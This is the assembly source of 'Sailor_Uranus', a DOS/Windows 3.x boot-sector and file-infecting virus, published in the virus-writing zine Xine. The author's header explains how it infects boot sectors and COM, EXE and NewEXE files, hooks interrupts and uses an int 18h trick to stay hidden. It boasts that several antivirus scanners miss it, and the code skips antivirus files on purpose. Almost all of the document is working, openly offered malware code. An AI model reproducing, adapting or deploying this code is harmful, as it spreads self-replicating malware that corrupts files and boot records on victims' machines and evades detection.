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| Xine - issue #2 - Phile 026 |
; Virus name : Sailor_Uranus
; Author : b0z0
; Group : iKx
; Origin : Padania, December 1996 / January 1997
; Compiling : Use TASM 3.00
; Then put the first 512 bytes into a floppy boot sector
; and the rest to the floppy boot starting at 79,1,13.
; Remember also to put the original boot sector to 79,1,12
; Targets : HD Boot Sector / FD Boot Sector / COM / EXE / NewEXE
; Infected COMs:
; All COMs that are smaller than
; 62463 and bigger than 1280 will
; be infected. Some antiviruses and
; special files won't be infected
; (in all three cases). Check the
; source code for more about these
; files.
; Infected EXEs:
; All EXEs without overlays and
; bigger than 5000 will be infected.
; This lenght check is also valid
; for NewEXEs.
; Infected NewEXEs:
; .CPL (control panel files)
; .DLL (dynamic link libs)
; .DRV (drivers)
; .EXE (just normal NewEXEs :-) )
; .FON (fonts)
; .FOT (other fonts... they are quite
; newer infected.. they are all
; skipped at the lenght test)
; .SCR (screen savers)
; The NewEXE infection is done using
; the VLAD-method (thanx Qark and
; QuantumG). There has been added some
; more check and modifies so now all
; infected NewEXEs will work correctly.
; Infected Floppy Boots:
; Only 1.44mb floppyes will be infected.
; The virus won't infect floppies that
; have a 'PK' as the label start. This
; is done to try to prevent damaging at
; least PKZIP multidisk archives.
; Infected HD boot:
; The boot sector of the first active
; partition will be infected. The active
; partition will be determined by a check
; in the partition table. Generally the
; DOS bootable partition is also set as
; active.
; Hooked ints : 13h and 21h
; 13h is hooked for floppy boot infections (AH = 02h)
; 21h hooked functions:
; 4b00h = Load and Execute
; 4eh = Findfirst
; 4fh = Findnext
; Size : Sailor_Uranus fits exactly (well, considering also the
; place for BPB data and 2 unused bytes :)) 4 floppy disk
; sectors (boot + 3 at the end of the floppy). Infected
; files (all kinds) will grow then 2048 bytes.
; Notes : Sailor_Uranus can go resident just if started from an
; infected boot. So any infected file will check if the
; virus is resident and if it isn't it will infect the
; HD boot. The virus infects the HD boot in two ways:
; - Using int 13h, if it is runned from and infected
; COM or EXE.
; - Using the IOCTL int 21h functions (440dh) if it
; is runned from a NewEXE
; This has been done because of course you can't directly
; use the int 13h calls while you are in protected mode,
; simply because selectors would be threated by the int 13h
; as a segment and this, as you may imagine, won't work
; very well :-) So using IOCTL we will give him our selectors
; and Win will do the whole work of convertion and so on for
; us. On the other side the IOCTL functions may be also used
; from the DOS, so why two ways of infections? The response
; is simple: IOCTL functions doesn't work with DBLSPACE and
; such programs, which are quite used around :( So i added
; also a second more standard int 13h way to infect.
; Sailor_Uranus have also 2 ways to hook int 21h. The first
; is the classic way to wait for 5 EXEs to be executed and
; checking the buffer for a 'MZ' at int 13h. The second is
; an "infected activation routine", this means that when an
; infected file is runned (this is only for DOS files) it
; will automatically trigger to the int 13h a check if the
; int 21h is already set. So the 'residency check' of the
; int 13h is also used to set int 21h. Maybe you are now
; thinking why i do this. Well, simple. On some DOS 6.22 with
; SMARTDRV and DRVSPACE loaded and a couple of other Windoze
; stuff int 13h 'MZ' check doesn't work.So on DOS 6.22 without
; the infected activation the virus may never hook int 21h.
; Residency: well, Sailor_Uranus doesn't hook interrupts
; under Windows. As you know Windows doesn't pass AH=4bh
; calls to the real mode interrupt (the DOS one). But it
; will pass usually all the 4Eh/4Fh calls, so under Win this
; virus will be able to infect files when they are searched
; (for example FileManager uses 4Eh/4Fh, so when the user will
; browse his dirs files will be infected). Now you may ask
; yourself why i said "will pass usually", why "usually"?
; Well, Win will pass these functions to the real mode
; int 21h only if the 32-bit access (32BFA) is disabled.
; But, hey! 32-bit access is disabled by default and also
; Microsuck doesn't encurage the users to use it. So, be
; sure, that more than the 95% of users has 32BFA turned off!
; About the various NewEXEs files that are infected.
; Obvisiously i am not pretending that FOTs or CPLs will
; carry the virus around :-) Basically i decided to infect
; them to mantain the virus on a system. Mainly anything
; that is Windows releated will be infected ;-) On the other
; side some of the strange infected files may be also
; considered as couriers. DRVs for example are very usual
; on various card vendor's disks. Also some screensavers
; may be distribuited around by ppl. Also VBX infection
; works ok, but many VBXs i tried to infect noticed the
; user that they have been changed, so i decided not to
; infect at all VBXs.
; To prevent an enormous loss of time files on floppy disk
; aren't infected.
; Sailor_Uranus uses the 18_Tech (refeer to Dandler's
; article for more information about this), so wind0ze
; (when 32 BDA is enabled) and some avs won't worry
; about our int 13h handler ;)
; AV, speak! : What does various AV says
; TBScan 7.06:
; COM - No Flags!
; EXE - K flag often
; NewEXE :
; .EXE - only B flag quite always
; others - No scan at all :-)
; Boot - No Flags!
; AVPlite 3.0 (updated bases):
; EXE - *sometime* Typo_COMTsr susp.
; COM - *sometime* Typo_COMTsr susp.
; All NewExes - Nothing!
; Boot - Nothing!
; FProt 2.25:
; - Normal scan
; Nothing in any case.
; - /analyse
; Will give a warning only on some COMs
; - /analyse /paranoid
; Will give a warning only on some COMs
; Well, the results of other AVs (Scan, NAV and so on) are
; all the same... i'll let you imagine :-)))
; Name origin : Sailor_Uranus is dedicated to Sailor Uranus, one of the
; Pretty Sailor Soldiers family.
; For more info : Of course, if you aren't satisfacted with my description
; and you don't have time to check out the code get VSUM
; (the year 2000 one, November edition) and read more
; interesting things about Sailor_Uranus 8-)
; Greetings : Of course a great thanx to Qark and QuantumG for writing
; the NewEXE infection tuorial and NE infectors.
; Thanx to Dandler for the very nice Int 18h trick infos!
; Thanx also to Darkman for the 4Eh/4Fh tutorial. You saved
; me a little of time ;)
; Registration : hehe :-) if you liked this virus just send me a line...
.model tiny
org 0
virus_lenght equ (offset virus_end - offset virus_start)
jmp short boot_start
org 3eh
xor ax,ax
mov ss,ax ; set SS:SP to 0000:7C00
mov ax,7c00h
mov sp,ax
push ss
pop ds
mov si,412h
inc si
mov ax,word ptr ds:[si] ; ax = avaiable mem
sub ax,3 ; 3 kb 'o' mem
mov word ptr ds:[si],ax
mov cl,06h
shl ax,cl
mov es,ax ; ES segment for our virus
mov di,200h ; copy 200h virus bytes
push di ; in memory
pop cx
sub di,di
mov bx,cx
mov si,7c00h
rep movsb
mov ax,203h ; read the body of the virus
mov cl,3 ; on hd at 0,0,3
sub dh,dh
cmp byte ptr ds:[fromfloppy + 7c00h],00h
jne load_from_hd ; or on floppy at
mov cx,4f0dh ; cylinder 79, sector 0dh
inc dh ; side 1
int 13h
mov byte ptr es:[int21set],05h ; int 21h set flag
mov si,04ch ; on 13h IVT entry
mov ax,word ptr ds:[si+2] ; save old int 13h
mov word ptr es:[seg13h],ax
mov ax,word ptr ds:[si] ; off:seg
mov word ptr es:[off13h],ax
push ds
mov ax,0f000h ; point to rom
mov ds,ax
xor bx,bx
inc bx
cmp word ptr ds:[bx],18cdh ; search for the int 18h
jne cd18loop
pop ds
mov word ptr ds:[si],bx ; point int13h to the cd18h
mov word ptr ds:[si + 2],ax
mov word ptr ds:[si + 14h],offset new_int13h
mov word ptr ds:[si + 16h],es ; set int 18h
push ds ; es=ds=00
pop es
mov ax,201h ; load the original bs
mov bx,7c00h
mov cx,2 ; 0,0,2 on hd
sub dh,dh
cmp byte ptr ds:[fromfloppy + 7c00h],00h
jne load_bs_from_hd
mov cx,4f0ch ; or here on floppy
inc dh
mov word ptr cs:[7c00h-2],13cdh
jmp virus_start-2 ; pass to original bs
fromfloppy db 00h ; 00h = floppy, 01h = hd
add sp,6 ; correct stack
xchg al,ah ; antiheuristic
cmp ax,2301h ; installation check
jne no_inst_check
cmp bl,0b0h ; from a dos executable?
jne alr_21handler
push ax ; yea, so try to force
push ds ; loading of int21 handler
call force_int21h_set
pop ds
pop ax
cmp al,02h ; read
xchg al,ah ; reput right stuff in AX
je check_floppy
db 0EAh ; old int 13h
off13h dw ?
seg13h dw ?
cmp byte ptr es:[bx],'M' ; longer but antiheuristic
jne end_21_check
cmp byte ptr es:[bx+1],'Z'
jne end_21_check
cmp byte ptr cs:[int21set],00h ; 21 already set?
je end_21_check
dec byte ptr cs:[int21set] ; decrease counter
cmp byte ptr cs:[int21set],00h ; time to hook?
jne end_21_check
xor ax,ax
mov ds,ax ; ds to ivt
push cs
pop ax
xchg word ptr ds:[086h],ax ; set our int 21h
mov word ptr cs:[seg21h],ax
mov ax,offset new_int21h
xchg word ptr ds:[084h],ax
mov word ptr cs:[off21h],ax
call dword ptr cs:off13h ; read it
jnc floppy_ok
jmp error ; exit on error
push ds
cmp cx,01h
je no_check_int21h
call check_int21h ; check for int 21h
jmp leave_13h ; installation
cmp dh,00h
jne leave_13h
cmp dl,1
ja leave_13h
cmp word ptr es:[bx+13h],2880 ; only 1.44mb
jne leave_13h
cmp word ptr es:[bx+2bh],'KP' ; label PKBACK...?
je leave_13h ; if so, leave
cmp word ptr es:[bx+boot_check+5],'US'
je leave_13h ; already inf?
push es
mov ax,201h
inc ah
push ax
mov cx,4f0ch ; cyl 79, sec 0ch
mov dh,1
int 13h ; save original boot
jnc ok_write
pop ax
pop es
jmp leave_13h ; write protected, go away
push es
pop ds
push cs
pop es
sub bp,bp ; copy boot data
call copy_boot_data
mov byte ptr cs:[fromfloppy],dh
pop ax
push bx
push ax
sub bx,bx ; put new boot
int 13h
pop ax ; ax=301h
inc al ; 3 sectors to write
inc al
mov bx,200h ; body of the virus
mov cx,4f0dh ; d,e and f
mov dh,01h
int 13h
pop bx
pop es
pop ds
retf 2
mov ax,0201h
push ax
lea bx,[offset filebuffer+bp]
mov dx,80h
mov cx,1
int 13h ; read mbr to our buffer
call table_check ; check partition table
pop ax
jc inf_hd_err ; carry if error while looking at
; the partition table
int 13h ; read boot sector
cmp word ptr [bx+boot_check+5],'US' ; already infected?
je inf_hd_err
push dx
push cx
call copy_boot_data ; copy needed data from bs
inc cx
mov ax,201h ; save original boot
inc ah
push ax
int 13h
pop ax ; save virus body
inc al
inc al
mov bx,200h
add bx,bp
inc cx
int 13h
pop cx
pop dx
mov byte ptr ds:[fromfloppy+bp],1 ; hd marker
mov bx,bp ; put virus boot
mov ax,201h
inc ah
int 13h
org 01feh
db 055h,0aah
new_int21h: ; our int 21h handler
cmp ah,4eh
je findfirst
cmp ah,4fh
je findnext
push ax ; fool heuristics
xchg al,ah
cmp ax,004bh
pop ax
jne do_int21h
jmp execution
db 0EAh ; original int 21h
off21h dw ?
seg21h dw ?
push es
lea di,filename
mov si,dx
push cs
pop es
mov word ptr cs:[di-4],di ; offset of filename
in ax,40h
xor al,ah
and al,0111b
mov byte ptr cs:[di-5],al ; infection counter
lodsb ; save search path
cmp al,00h
je pathexit
stosb ; es:di = filename
cmp al,':'
je ok_sepa
cmp al,'\'
jne getpath
mov word ptr cs:[filenameoff],di
jmp getpath
pop es ; restore regs
call dword ptr cs:off21h
push ds
push es
cmp byte ptr cs:[tmpcounter],07h
jae time_to_infect
inc byte ptr cs:[tmpcounter]
jmp go_away
mov ah,2fh ; get DTA
int 21h
mov di,cs:[filenameoff]
mov si,bx
add si,1eh ; filename
push es
pop ds
push cs
pop es
cmp al,'.'
jne isntadot
mov word ptr cs:[filedotoff],di ; save dot position
or al,al ; end of filename?
jne getfname
push cs
pop ds
mov dx,offset filename
mov di,[filedotoff]
mov byte ptr ds:[tmpcounter],00h
cmp word ptr ds:[di],'OC' ; .com
je ok_inf
mov byte ptr ds:[tmpcounter],01h
cmp word ptr ds:[di],'XE' ; .exe
je ok_inf
cmp word ptr ds:[di],'LD' ; .dll
je ok_inf
cmp word ptr ds:[di],'OF' ; .fon and .fot
je ok_inf
cmp word ptr ds:[di],'RD' ; .drv
je ok_inf
cmp word ptr ds:[di],'CS' ; .scr
je ok_inf
; cmp word ptr ds:[di],'BV' ; .vbx is too risky
; je ok_inf
cmp word ptr ds:[di],'PC' ; .cpl
jne go_away
call infect_it
pop es
pop ds
retf 2
push ds
push es
mov byte ptr cs:[tmpcounter],0b0h ; exec marker
mov ah,19h ; get current default drive
int 21h
cmp al,2
jae ok_drive ; don't infect on floppyes
jmp exit_at_all
push ds
push dx
push cs
pop ds
mov ax,3524h ; get int24h seg and off
int 21h
mov word ptr ds:[old_int24_off],bx ;store them
mov word ptr ds:[old_int24_seg],es
mov dx,offset int24h ; set our int24h
mov ax,2524h
int 21h
pop dx
pop ds
push dx
pop di
cmp byte ptr ds:[di],'.' ; search dot
je got_namedot
cmp byte ptr ds:[di],00h ; end of filename?
jne cn_int_loop
jmp end_infection
inc di
jmp check_name_loop
cmp byte ptr ds:[di+4],00h ; is the extension dot?
jne cn_int_loop
lea si,dontinfect ; point on noninfectables
mov cx,word ptr cs:[si]
cmp word ptr ds:[di-2],cx ; look each file
jne next_av
jmp end_infection
inc si
inc si
cmp byte ptr cs:[si],00h ; end of the list?
je end_check
jmp check_av_loop
mov ax,4300h
int 21h ; Get attributes
mov word ptr cs:[file_att],cx
sub cx,cx ; clear attributes
call set_attributes
jc end_infection ; exit on error
push ds ; save ds:dx to filename on stack
push dx
mov ax,3d02h ; open in rw mode
int 21h
jc end_infection_wfa
mov bx,ax ; handle in bx
push cs
pop ds
mov ax,5700h ; get time/date
int 21h
push dx
push cx
mov ah,3fh ; read a bounch of bytes
mov cx,41h
lea dx,filebuffer ; to our buffer
mov si,dx
int 21h
cmp byte ptr ds:[si],'M' ; exe?
jne isnotanexe
cmp byte ptr ds:[si+1],'Z' ; really exe?
jne isnotanexe
cmp word ptr ds:[si+12h],'US' ; exe marker?
je close_and_finish
cmp byte ptr ds:[si+1ah],ch ; no overlays?
jne close_and_finish
mov al,02h ; get lenght of the file
call seekfile
or dx,dx ; ok if > 64k
jnz oklenght
cmp ax,800h
jbe close_and_finish ; not ok if < 5000
cmp byte ptr ds:[si+18h],'@' ; winexe?
je infect_winexe
call infect_exe
jmp close_and_finish
cmp byte ptr ds:[tmpcounter],01h ; Prevent ruining
je close_and_finish ; files
; Infact we may have founded a file from
; another program that have the same
; extension as a windows part but of
; course it isn't a NewEXE. For example
; i saw some programs that have their
; files named as xxx.DRV and we don't
; want to destroy them :-)
cmp byte ptr [si],0e9h ; jmp?
jne comtest
cmp byte ptr [si+3],'S'
je close_and_finish
call infect_com
pop cx
pop dx
mov ax,0157h ; restore time/date
xchg al,ah
int 21h
mov ah,3eh ; close file
int 21h
pop dx ; ds:dx pointer to filename
pop ds
mov cx,word ptr cs:[file_att] ; attributes
jc end_infection
call set_attributes ; put original attributes
mov ax,2524h
mov ds,cs:[old_int24_seg]
mov dx,cs:[old_int24_off]
int 21h ; restore int24h
cmp byte ptr cs:[tmpcounter],0b0h ; was executing?
je real_end
mov byte ptr cs:[tmpcounter],00h
pop es
pop ds
jmp do_int21h
mov di,offset winexe_data
mov ax,word ptr [si+3ch] ; nexe header offset
mov word ptr ds:[di],ax
mov word ptr ds:[si+12h],'US' ; infection marker
sub word ptr ds:[si+3ch],8 ; enought room?
cmp word ptr ds:[si+3eh],0
jne close_and_finish
sub al,al ; seek to start
call seekfile
mov ah,40h ; rewrite header
mov cl,ah
xor ch,ch
mov dx,si
int 21h
jc close_and_finish ; exit on error
sub al,al
mov dx,word ptr ds:[di] ; to newexe header
call seekfile_mid_cx
mov ah,3fh ; read NE header
mov cx,512
mov dx,si
int 21h
cmp word ptr ds:[si+36h],0802h ; only Win NewEXEs
jne bad_nexe ; with gangload area
cmp word ptr ds:[si],'EN' ; don't infect LE/PE
je ok_newexe
sub al,al ; start of file
call seekfile
mov ah,3fh ; reread exe hdr
mov cx,41h
mov dx,si
int 21h
add word ptr ds:[si+3ch],8 ; restore changed data
sub al,al ; start of file
call seekfile
; leave the marker
mov ah,40h ; so we wouldn't waste
mov cl,ah ; time once again
xor ch,ch
mov dx,si
int 21h ; write header
jmp close_and_finish
mov dx,8 ; change the segment table
mov ax,word ptr ds:[si+22h]
cmp word ptr ds:[si+4],ax
jb no_firsta
add word ptr ds:[si+4],dx
mov cx,4
push si
add si,24h
cmp word ptr ds:[si],ax ; change where needed
jb no_8_add
add word ptr ds:[si],dx
inc si
inc si
loop pnt_check
pop si
mov ax,word ptr [si+1ch]
inc word ptr [si+1ch]
mov cx,dx
sub dx,dx
mov byte ptr ds:[si+37h],dl
mov word ptr ds:[si+38h],dx ; kill gangload area
mov word ptr ds:[si+3ah],dx ; so all NewEXEs will work
mul cx
mov cx,512
add ax,word ptr ds:[si+22h]
adc dx,0
div cx
mov word ptr ds:[di+3h],ax ; NE size
mov word ptr ds:[di+5h],dx
mov ax,offset winexe_entry
xchg ax,word ptr ds:[si+14h] ; put new ip and
mov word ptr ds:[di-02h],ax ; store old ip
mov ax,word ptr ds:[si+1ch]
xchg ax,word ptr ds:[si+16h] ; put new cs and
mov word ptr ds:[di-04h],ax ; store old cs
mov al,byte ptr ds:[si+32h] ; segment align
mov byte ptr ds:[di+2h],al
mov ax,word ptr ds:[di] ; newexe offset
mov word ptr ds:[di+7h],ax
mov ax,word ptr ds:[di+3h] ; ne header size
or ax,ax
jz last_page
dec word ptr ds:[di+3h]
sub al,al
mov dx,word ptr ds:[di+7h] ; where to go
sub dx,8
call seekfile_mid_cx
mov ah,40h ; write
mov cx,512
add word ptr ds:[di+7h],cx
mov dx,si
int 21h
sub al,al
push cx
mov dx,word ptr ds:[di+7h] ; to next chunk
call seekfile_mid_cx
mov ah,3fh ; read it
mov dx,si
pop cx
int 21h
jmp move_header_fwd
mov al,02h
call seekfile
mov cl,byte ptr ds:[di+2h] ; segment align
push bx
mov bx,1
shl bx,cl ; shift segment offset
mov cx,bx ; by segment align
pop bx
div cx
mov word ptr ds:[di+9h],0
or dx,dx
jz no_extra
sub cx,dx
mov word ptr ds:[di+9h],cx
inc ax
push di
mov di,si
add di,word ptr ds:[last_ne]
mov word ptr [di],ax ; segment offset
mov word ptr [di+2],virus_lenght
mov word ptr [di+4],180h ; Segment attributes
mov word ptr [di+6],virus_lenght + 1024
pop di
sub al,al
mov dx,word ptr ds:[di+7h] ; where to go
sub dx,8
call seekfile_mid_cx
mov ah,40h
mov cx,word ptr ds:[di+5h] ; write last chunk
add cx,8
mov dx,si
int 21h
sub cx,cx
xchg word ptr ds:[winip],cx
push cx
sub cx,cx ; reset reloc pointer
dec cx
xchg word ptr ds:[wincs],cx
push cx
mov al,02h
mov dx,word ptr ds:[di+9h] ; end of file
call seekfile_mid_cx
mov ah,40h ; write virus body
mov cx,virus_lenght
sub dx,dx
int 21h
pop word ptr ds:[wincs] ; restore reloc
pop word ptr ds:[winip] ; pointer
mov ah,40h ; write reloc item
mov dx,offset relocitem
mov cx,(offset relocitem_end-offset relocitem)
int 21h
jmp close_and_finish
mov al,02h
call seekfile ; AX:DX = lenght
push ax ; check _really_ no overlays
push dx
mov cx,word ptr [si+04h]
mov ax,512 ; compare lenght calculated
mul cx ; from header with the real
add ax,word ptr [si+02h] ; lenght we got from lseek
adc dx,00h
mov word ptr [si-02h],dx
mov word ptr [si-04h],ax
pop dx
pop ax
cmp dx,word ptr [si-02h]
ja exit_exe_infection
cmp ax,word ptr [si-04h]
ja exit_exe_infection
push ax
push dx
mov cx,10h ; calculate new
div cx ; cs:ip for exe
sub ax,word ptr [si+8h]
add dx,offset exe_entry
push ax
xchg word ptr [si+16h],ax ; new CS
mov word ptr ds:[victim_cs],ax
pop ax
push dx
xchg word ptr [si+14h],dx ; new IP
mov word ptr ds:[victim_ip],dx
pop dx
add dx,(offset virus_end + 800) ; SP after us
and dl,0feh
xchg word ptr [si+0eh],ax ; new SS
mov word ptr ds:[victim_ss],ax
xchg word ptr [si+10h],dx ; new SP
mov word ptr ds:[victim_sp],dx
pop dx ; pop length
pop ax
add ax,virus_lenght
adc dx,00h
mov cx,512
div cx
inc ax
mov word ptr [si+04h],ax ; new nr of pages
mov word ptr [si+02h],dx ; new image mod 512
mov word ptr [si+12h],'US' ; infection marker
mov byte ptr [exeorcom],00h ; exe marker
sub dx,dx
mov ah,40h
mov cx,virus_lenght ; write virus body
int 21h
mov cx,1ch
push cx
sub al,al
call seekfile ; go to start
mov ah,40h ; write header
pop cx
mov dx,si
int 21h
push ds
pop es
lea di,orig_bytes ; save first 4 bytes
mov al,02h ; end of file
call seekfile
cmp ah,0f3h ; not bigger than...
ja infect_com_exit
cmp ah,04h ; not smaller than...
jbe infect_com_exit
sub ax,03h
add ax,offset exe_entry ; calculate jump
mov word ptr com_jump + 01h, ax
mov byte ptr [exeorcom],01h ; com marker
mov ah,40h
sub dx,dx
mov cx,virus_lenght ; write virus body
int 21h
mov cx,04h
push cx
sub al,al
call seekfile ; start of the file
mov ah,40h ; write new jump
pop cx
mov dx,offset com_jump
int 21h
seekfile: ; move around the file
sub ah,ah ; so cwd will work
sub cx,cx
mov ah,42h
int 21h
exe_entry: ; EXE and COM entry point
call deltaoffset
push ds
push es
mov bp,sp
mov bx,[bp+4]
mov bp,bx
sub bp,offset deltaoffset ; delta offset
mov bl,0b0h
mov ax,0123h ; residency check
int 13h
cmp ax,2301h
je already_in_mem
push cs
pop es
push cs
pop ds
call infect_hd_by_13h ; infect hd by int 13h
pop es
pop ds
pop ax
cmp byte ptr cs:[exeorcom + bp],01h
je com_exit ; exe or com finish
mov ax,es ; calculate cs and ss
add ax,10h
add cs:[victim_cs + bp],ax
mov sp,word ptr cs:[victim_sp + bp]
add ax,word ptr cs:[victim_ss + bp]
mov ss,ax
sub ax,ax ; zero regs
sub bx,bx
sub cx,cx
sub dx,dx
sub di,di
sub si,si
push cs:[victim_cs+bp] ; push old cs:ip
push cs:[victim_ip+bp]
sub bp,bp
retf ; return to old cs:ip
victim_ip dw 00000h
victim_cs dw 0fff0h
victim_sp dw 00000h
victim_ss dw 00000h
orig_bytes db 00h,00h,00h,00h ; original com bytes
com_jump db 0e9h,00h,00h ; space for our com jump
; the S will be also of
; use for infection check
virus_name db 'Sailor_Uranus'
exeorcom db 00h ; 01 = COM, 00 = EXE
mov di,0ffh
lea si,[orig_bytes + bp]
inc di
push di
pop ax
movsw ; restore 4 com bytes
jmp ax ; jump to cs:100
winexe_entry: ; Entry point for NExes
push es
push ds
sub bx,bx
mov ax,0123h ; residency check
int 13h
cmp ax,2301h
je already_inf
mov ax,000ah ; Create Alias Descriptor
mov bx,cs ; so our cs is writeable
int 31h
mov ds,ax
mov bx,ax
mov ax,0008h ; Set Segment Limit
sub cx,cx ; so we are _sure_ that we
mov dx,0c00h ; will have enough space for
int 31h ; hd infection
push ds
pop es
sub bp,bp
call infect_hdboot ; infect HD boot with int 21h
mov ax,0001h ; free LDT descriptor we used
mov bx,ds
int 31h
pop ds
pop es
db 0EAh ; return to original exe
winip dw 0
wincs dw 0ffffh
virus_author db 'b0z0/iKx'
mov al,00h
dontinfect db 'AN','OT','86','AV','VP','US','IL','ED'
db 'OP','ND','LP','GR','PL','RK','YR','RE',0
; Antiviruses:
; AN - tbscan
; - scan
; OT - f-prot
; AV - nav
; - ms*av
; VP - avp
; US - findvirus
; OP - virstop
; Files that will tell the user that they were changed and that they are
; probably infected by a virus:
; IL - msmail and msmail releated
; ED - mssched.dll
; mssched.exe
; and some other Scheduler+ files
; LP - winhelp.exe
; GR - wgpomgr.dll
; - mailmgr.dll
; PL - mailspl.exe
; RK - framework.dll
; RE - store.dll
; And this won't be infected because they won't work. I really don't know
; why...
; ND - lzexpand.dll
; 86 - kern386
infect_hdboot: ; infects HD boot with int21h
lea bx,[offset filebuffer+bp]
sub cx,cx
sub dh,dh
call do_read ; read the MBR
jc hderror
call table_check ; find active partition
jc hderror
dec cl ; no carry -> read
call do_read ; read boot sector
cmp word ptr [bx+boot_check+5],'US' ; already infected?
je hderror
push dx
push cx
call copy_boot_data ; copy boot stuff
mov byte ptr ds:[fromfloppy+bp],cl
stc ; write
call do_read
inc cx ; save body of the virus
lea bx,[offset second_part_start+bp]
stc ; write
call do_read
inc cx
add bx,200h ; next part
stc ; write
call do_read
add bx,200h ; next part
inc cx
stc ; write
call do_read
pop cx
pop dx
mov bx,bp ; put virus boot
stc ; write
call do_read
lea si,[bx+03h] ; copy cool boot stuff
lea di,[bp+03h]
mov cx,03bh
rep movsb
sub dh,dh
inc cx
table_check: ; finds the first bootable
mov cl,4 ; partition and put in
add bx,01beh ; DX and CX the head,
; sector and cylinder
; (in the format as int
; 13h wants)
dec cl
cmp byte ptr ds:[bx],080h ; is bootable?
je boot_found
add bx,010h ; next partition
cmp cl,0
jne ptable_loop
stc ; all partition examined
ret ; but no active. leave
; with carry as error
mov dx,word ptr ds:[bx]
mov cx,word ptr ds:[bx+2] ; sector + cyl
lea bx,[offset filebuffer+bp] ; and point on buffer
mov ax,0143h ; no flags
xchg al,ah
int 21h
; if Carry is set then this will do a WRITE on the HD
; if Carry isn't set then a READ will be executed
push dx
push cx
mov di,offset rw_struct ; point to the structure
pushf ; needed by 440dh
add di,bp
mov word ptr ds:[di+9],bx ; store in the structure
mov word ptr ds:[di+11],ds ; as needed
mov byte ptr ds:[di+1],dh
mov byte ptr ds:[di+3],ch
mov byte ptr ds:[di+5],cl
mov cl,041h ; select between write (41h)
jc do_rwop ; and read (61h)
add cl,20h
mov ch,08h ; 08h = disk drive
mov ax,440dh ; IOCTL generic block device req
push bx
mov bl,03h ; on C:
mov dx,di ; point to structure
int 21h
pop bx
pop cx
pop dx
rw_struct: ; read write structure
fix_byte db 00h
head_word dw 00h
cyl_word dw 00h
sec_word dw 00h
nr_word dw 0001h ; one sector at once. I think
where_off dw 00h ; that this is a bug, because
where_seg dw 00h ; DOS doesn't want to write/read
; more than one sectore at once :(
; or at least on all the machined
; i tested it wasn't working :(((
; so we will write/read one sector
; at once
relocitem: ; relocation item for NewEXEs
dw 1
db 3
db 4
dw offset winip
old_cs dw 0
old_ip dw 0
; end of the virus in the file
winexe_data: ; data needed for newexe
newexe_off dw 0 ; infection
al_shift db 0
ne_size dw 0
last_ne dw 0
lseek dw 0
lseek_add dw 0
int21set db 09h ; Int 21h set flag
old_int24_off dw ? ; original int24 offset
old_int24_seg dw ? ; original int24 segment
tmpcounter db 00h ; counter for 4eh/4fh infection
filenameoff dw ? ; stuff for 4eh/4fh infection
filedotoff dw ?
filename db 4ch dup (?)
lenax dw ? ; lenght of the file
lendx dw ?
filebuffer db 512 dup (?) ; buffer for r/w operations
file_att dw ? ; file attributes
; end of the virus in memory